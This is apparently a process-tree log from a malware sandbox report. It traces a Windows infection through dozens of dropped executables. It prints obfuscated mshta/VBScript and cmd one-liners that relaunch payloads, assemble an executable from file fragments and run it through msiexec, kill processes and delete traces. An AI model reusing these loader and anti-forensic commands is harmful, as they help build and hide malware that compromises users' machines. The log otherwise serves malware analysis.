C:\Users\Admin\Pictures\Adobe Films\sjP2NNGLkLXmtRLr84FTXoXx.exe"C:\Users\Admin\Pictures\Adobe Films\sjP2NNGLkLXmtRLr84FTXoXx.exe"2⤵
- Executes dropped EXE
PID:1236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im sjP2NNGLkLXmtRLr84FTXoXx.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\sjP2NNGLkLXmtRLr84FTXoXx.exe" & del C:\ProgramData\*.dll & exit3⤵PID:5988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sjP2NNGLkLXmtRLr84FTXoXx.exe /f4⤵
- Kills process with taskkill
PID:5764
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZtQmi64xfNHBdyzqDnGYn0w1.exe"C:\Users\Admin\Pictures\Adobe Films\ZtQmi64xfNHBdyzqDnGYn0w1.exe"2⤵
- Executes dropped EXE
PID:2584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 6603⤵
- Program crash
PID:1536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 6403⤵
- Program crash
PID:4760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 6883⤵
- Program crash
PID:4584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 8603⤵
- Program crash
PID:5008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 6763⤵
- Program crash
PID:4252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 11163⤵
- Program crash
PID:4380
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4a_srNM9UohMmVM9bKpDSGS4.exe"C:\Users\Admin\Pictures\Adobe Films\4a_srNM9UohMmVM9bKpDSGS4.exe"2⤵
- Executes dropped EXE
PID:1180
-
-
C:\Users\Admin\Pictures\Adobe Films\Rn16AjUDOEUw_Phj5cpEWNW3.exe"C:\Users\Admin\Pictures\Adobe Films\Rn16AjUDOEUw_Phj5cpEWNW3.exe"2⤵
- Executes dropped EXE
PID:2400 -
C:\Users\Admin\AppData\Roaming\4804460.exe"C:\Users\Admin\AppData\Roaming\4804460.exe"3⤵PID:5108
-
-
C:\Users\Admin\AppData\Roaming\8470958.exe"C:\Users\Admin\AppData\Roaming\8470958.exe"3⤵PID:3488
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:4688
-
-
-
C:\Users\Admin\AppData\Roaming\736162.exe"C:\Users\Admin\AppData\Roaming\736162.exe"3⤵PID:4392
-
-
C:\Users\Admin\AppData\Roaming\7442260.exe"C:\Users\Admin\AppData\Roaming\7442260.exe"3⤵PID:4728
-
C:\Users\Admin\AppData\Roaming\4836048.exe"C:\Users\Admin\AppData\Roaming\4836048.exe"4⤵PID:4772
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPT: CLOSe ( CREateoBjECt ("WscrIPT.ShELl" ). RuN("cmd /R COpy /Y ""C:\Users\Admin\AppData\Roaming\4836048.exe"" UvBEEXS0j9TB14.exE &&start UvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E & IF """" == """" for %v iN ( ""C:\Users\Admin\AppData\Roaming\4836048.exe"" ) do taskkill -IM ""%~NXv"" /F " , 0, TRuE) )5⤵PID:1248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COpy /Y "C:\Users\Admin\AppData\Roaming\4836048.exe" UvBEEXS0j9TB14.exE &&start UvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E & IF "" == "" for %v iN ("C:\Users\Admin\AppData\Roaming\4836048.exe" ) do taskkill -IM "%~NXv" /F6⤵PID:3888
-
C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exEUvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E7⤵PID:5284
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPT: CLOSe ( CREateoBjECt ("WscrIPT.ShELl" ). RuN("cmd /R COpy /Y ""C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exE"" UvBEEXS0j9TB14.exE &&start UvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E & IF ""-pkJzup02N2uLj2E "" == """" for %v iN ( ""C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exE"" ) do taskkill -IM ""%~NXv"" /F " , 0, TRuE) )8⤵PID:5380
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COpy /Y "C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exE" UvBEEXS0j9TB14.exE &&start UvBEeXS0J9tB14.ExE -pkJzup02N2uLj2E & IF "-pkJzup02N2uLj2E " == "" for %v iN ("C:\Users\Admin\AppData\Local\Temp\UvBEEXS0j9TB14.exE" ) do taskkill -IM "%~NXv" /F9⤵PID:5568
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipT: Close ( creatEobJEcT ( "wsCriPT.ShEll"). RUn( "cMd.Exe /C echO dPPgqC:\Users\Admin\AppData\RoamingJfp> ubQM.U & eCho | sET /P = ""MZ"" > aDE8.34 & CopY /B /y aDe8.34 + GCB~m_.PJ+ NrTw.Mq + Y14qE.K + CPWM.WE + BAN3N.L + uBQM.u LSSVZU.yk~ &StArt msiexec -y .\LsSVZU.yK~ " ,0, trUe) )8⤵PID:5844
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C echO dPPgqC:\Users\Admin\AppData\RoamingJfp> ubQM.U & eCho | sET /P = "MZ" > aDE8.34& CopY /B /y aDe8.34 +GCB~m_.PJ+ NrTw.Mq+Y14qE.K + CPWM.WE + BAN3N.L+ uBQM.u LSSVZU.yk~ &StArt msiexec -y .\LsSVZU.yK~9⤵PID:5148
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCho "10⤵
- Blocklisted process makes network request
PID:2720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>aDE8.34"10⤵PID:5796
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y .\LsSVZU.yK~10⤵PID:5620
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "4836048.exe" /F7⤵
- Kills process with taskkill
PID:5612
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\7816279.exe"C:\Users\Admin\AppData\Roaming\7816279.exe"4⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Roaming\6628600.exe"C:\Users\Admin\AppData\Roaming\6628600.exe"3⤵PID:4756
-
-
C:\Users\Admin\AppData\Roaming\5530473.exe"C:\Users\Admin\AppData\Roaming\5530473.exe"3⤵PID:4660
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sxrRrick3gD4kfxFesJBiP0k.exe"C:\Users\Admin\Pictures\Adobe Films\sxrRrick3gD4kfxFesJBiP0k.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:676 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:2404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5160
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PeRBFnMEUcYITSFocoY9fLRF.exe"C:\Users\Admin\Pictures\Adobe Films\PeRBFnMEUcYITSFocoY9fLRF.exe"2⤵
- Executes dropped EXE
PID:1448
C:\Users\Admin\Pictures\Adobe Films\jBWeyRHTi62HuqZULFmHBJZQ.exe"C:\Users\Admin\Pictures\Adobe Films\jBWeyRHTi62HuqZULFmHBJZQ.exe"2⤵
- Executes dropped EXE
PID:892
C:\Users\Admin\Pictures\Adobe Films\FvB0vwSDHiNEaiHHprj88QvP.exe"C:\Users\Admin\Pictures\Adobe Films\FvB0vwSDHiNEaiHHprj88QvP.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1316
C:\Users\Admin\Pictures\Adobe Films\x_aSVw4EDPeHhdDlVBUwnD5i.exe"C:\Users\Admin\Pictures\Adobe Films\x_aSVw4EDPeHhdDlVBUwnD5i.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3640
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵PID:1732
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"3⤵PID:684
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵
- Executes dropped EXE
PID:1104
C:\Users\Admin\Pictures\Adobe Films\nAcUXNNobKFMoFFQJ9XOsJ52.exe"C:\Users\Admin\Pictures\Adobe Films\nAcUXNNobKFMoFFQJ9XOsJ52.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1232
C:\Users\Admin\Pictures\Adobe Films\nAcUXNNobKFMoFFQJ9XOsJ52.exe"C:\Users\Admin\Pictures\Adobe Films\nAcUXNNobKFMoFFQJ9XOsJ52.exe"3⤵
- Executes dropped EXE
PID:3052
C:\Users\Admin\Pictures\Adobe Films\uvSQkFfGlN4hF4GFY7NSg2XG.exe"C:\Users\Admin\Pictures\Adobe Films\uvSQkFfGlN4hF4GFY7NSg2XG.exe"2⤵
- Executes dropped EXE
PID:2640
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 3963⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3320
C:\Users\Admin\Pictures\Adobe Films\WH0lWYx3KsYqWPkVAZlF8sNH.exe"C:\Users\Admin\Pictures\Adobe Films\WH0lWYx3KsYqWPkVAZlF8sNH.exe"2⤵
- Executes dropped EXE
PID:3240
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 4003⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4068
C:\Users\Admin\Pictures\Adobe Films\0x6o3hs3eABLDe2nznrTWCcJ.exe"C:\Users\Admin\Pictures\Adobe Films\0x6o3hs3eABLDe2nznrTWCcJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2396
C:\Users\Admin\Pictures\Adobe Films\4XXl_o0ZoNjiS8c1uCdyespF.exe"C:\Users\Admin\Pictures\Adobe Films\4XXl_o0ZoNjiS8c1uCdyespF.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2208
C:\Users\Admin\Pictures\Adobe Films\cS1iPoHMzXj4Y6kY3A6yydrM.exe"C:\Users\Admin\Pictures\Adobe Films\cS1iPoHMzXj4Y6kY3A6yydrM.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3896
C:\Users\Admin\Pictures\Adobe Films\Ns_bc3yvvzhDnhFBWNVaCAoA.exe"C:\Users\Admin\Pictures\Adobe Films\Ns_bc3yvvzhDnhFBWNVaCAoA.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1968
C:\Users\Admin\Pictures\Adobe Films\FgfMTZvTbi4wD01SGlMOF8MG.exe"C:\Users\Admin\Pictures\Adobe Films\FgfMTZvTbi4wD01SGlMOF8MG.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1964
C:\Users\Admin\Pictures\Adobe Films\jRu17kZMHmlu09jEcP7j8AiT.exe"C:\Users\Admin\Pictures\Adobe Films\jRu17kZMHmlu09jEcP7j8AiT.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2108
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 5603⤵
- Program crash
PID:4212
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:3884
C:\Users\Admin\Pictures\Adobe Films\SIv0sTchmQvzTnVJQD4OBmUl.exe"C:\Users\Admin\Pictures\Adobe Films\SIv0sTchmQvzTnVJQD4OBmUl.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1864
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:2868
C:\Users\Admin\Pictures\Adobe Films\TxDbe8aS2EdqwtmMaCuHHaCv.exe"C:\Users\Admin\Pictures\Adobe Films\TxDbe8aS2EdqwtmMaCuHHaCv.exe"2⤵
- Executes dropped EXE
PID:2308
C:\Users\Admin\Pictures\Adobe Films\abhu1kShLo0fkEoK5LZXfLdY.exe"C:\Users\Admin\Pictures\Adobe Films\abhu1kShLo0fkEoK5LZXfLdY.exe"2⤵PID:5028
C:\Users\Admin\AppData\Local\Temp\is-8H5D1.tmp\abhu1kShLo0fkEoK5LZXfLdY.tmp"C:\Users\Admin\AppData\Local\Temp\is-8H5D1.tmp\abhu1kShLo0fkEoK5LZXfLdY.tmp" /SL5="$201DA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\abhu1kShLo0fkEoK5LZXfLdY.exe"3⤵PID:5056
C:\Users\Admin\AppData\Local\Temp\is-TNQAE.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-TNQAE.tmp\lakazet.exe" /S /UID=27094⤵PID:4500
C:\Users\Admin\AppData\Local\Temp\46-90760-4ae-abfb4-3b57f2a72566d\Julenemilae.exe"C:\Users\Admin\AppData\Local\Temp\46-90760-4ae-abfb4-3b57f2a72566d\Julenemilae.exe"5⤵PID:5648
C:\Users\Admin\AppData\Local\Temp\09-bb974-dd8-6bfa3-75ae17bb20c3f\Xaeshapaerepae.exe"C:\Users\Admin\AppData\Local\Temp\09-bb974-dd8-6bfa3-75ae17bb20c3f\Xaeshapaerepae.exe"5⤵PID:5728
C:\Program Files\Windows Multimedia Platform\VKDAEILCWR\foldershare.exe"C:\Program Files\Windows Multimedia Platform\VKDAEILCWR\foldershare.exe" /VERYSILENT5⤵PID:5536
C:\Users\Admin\AppData\Local\Temp\C72F.exeC:\Users\Admin\AppData\Local\Temp\C72F.exe1⤵PID:3700
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:3092
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6184